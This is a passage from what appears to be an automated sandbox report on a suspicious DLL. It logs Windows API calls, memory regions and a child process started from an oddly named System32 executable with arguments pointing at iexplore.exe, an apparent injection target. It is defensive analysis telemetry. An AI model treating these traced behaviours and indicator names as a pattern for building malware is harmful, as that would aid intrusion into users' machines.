(hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0035.897] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0035.898] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0035.898] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0035.898] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0035.899] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0035.899] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0035.899] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0035.899] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0035.899] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0035.899] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0035.899] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.899] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.899] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0035.900] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0035.901] HeapDestroy (hHeap=0x1340000) returned 1 Process: id = "63" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb80" os_pid = "0xd80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"iexplore.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2753 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2754 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2755 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2756 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2757 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2758 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2759 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2760 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 2761 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2762 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2763 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2764 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2765 start_va = 0x2c0000 end_va = 0x326fff entry_point = 0x2c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2766 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2767 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2768 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2769 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2770 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2771 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2772 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2773 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2774 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2775 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2776 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2777 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2778 start_va = 0x330000 end_va = 0x3f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000330000" filename = "" Region: id = 2779 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2780 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2781 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2782 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2783 start_va = 0x400000 end_va = 0x500fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 2784 start_va = 0x510000 end_va = 0x110ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2785 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2786 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2787 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2788 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2789 start_va = 0x1110000 end_va = 0x116ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 2790 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2791 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2792 start_va = 0x1200000 end_va = 0x12affff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Thread: id = 132 os_tid = 0xd84 [0035.935] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa4c | out: lpSystemTimeAsFileTime=0x16fa4c*(dwLowDateTime=0xe31a8710, dwHighDateTime=0x1d3dfba)) [0035.935] GetCurrentProcessId () returned 0xd80 [0035.935] GetCurrentThreadId () returned 0xd84 [0035.935] GetTickCount () returned 0x181ad [0035.935] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa44 | out: lpPerformanceCount=0x16fa44*=376110245) returned 1 [0035.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.936] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.936] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.936] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.936] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.936] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.936] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.936] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.936] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.936] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.937] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.937] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.937] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.937] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.937] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.937] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.938] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.938] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.938] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.938] GetCurrentThreadId () returned 0xd84 [0035.938] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllUnregisterServer /fn_args=\"iexplore.exe\"" [0035.938] GetEnvironmentStringsW () returned 0x1d7980* [0035.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0035.938] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x11609f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0035.938] FreeEnvironmentStringsW (penv=0x1d7980) returned 1 [0035.938] GetStartupInfoA (in: lpStartupInfo=0x16f99c | out: lpStartupInfo=0x16f99c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0035.938] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0035.938] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0035.938] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0035.938] SetHandleCount (uNumber=0x20) returned 0x20 [0035.938] GetLastError () returned 0x0 [0035.938] SetLastError (dwErrCode=0x0) [0035.938] GetLastError () returned 0x0 [0035.938] SetLastError (dwErrCode=0x0) [0035.938] GetLastError () returned 0x0 [0035.939] SetLastError (dwErrCode=0x0) [0035.939] GetACP () returned 0x4e4 [0035.939] GetLastError () returned 0x0 [0035.939] SetLastError (dwErrCode=0x0) [0035.939] IsValidCodePage (CodePage=0x4e4) returned 1 [0035.939] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f97c | out: lpCPInfo=0x16f97c) returned 1 [0035.939] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x16f448 | out: lpCPInfo=0x16f448) returned 1 [0035.939] GetLastError () returned 0x0 [0035.939] SetLastError (dwErrCode=0x0) [0035.939] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x16f3d8 | out: lpCharType=0x16f3d8) returned 1 [0035.939] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f85c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.939] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f85c, cbMultiByte=256, lpWideCharStr=0x16f1c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā") returned 256 [0035.939] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ왈狰Ā", cchSrc=256, lpCharType=0x16f45c | out: lpCharType=0x16f45c) returned 1 [0035.939] GetLastError () returned 0x0 [0035.939] SetLastError (dwErrCode=0x0) [0035.939] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0035.939] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f85c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0035.939] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f85c, cbMultiByte=256, lpWideCharStr=0x16f198, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.939] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0035.939] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x16ef88, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0035.939] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x16f75c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿFw¡õ\x94ù\x16", lpUsedDefaultChar=0x0) returned 256 [0035.939] GetLastError () returned 0x0 [0035.939] SetLastError 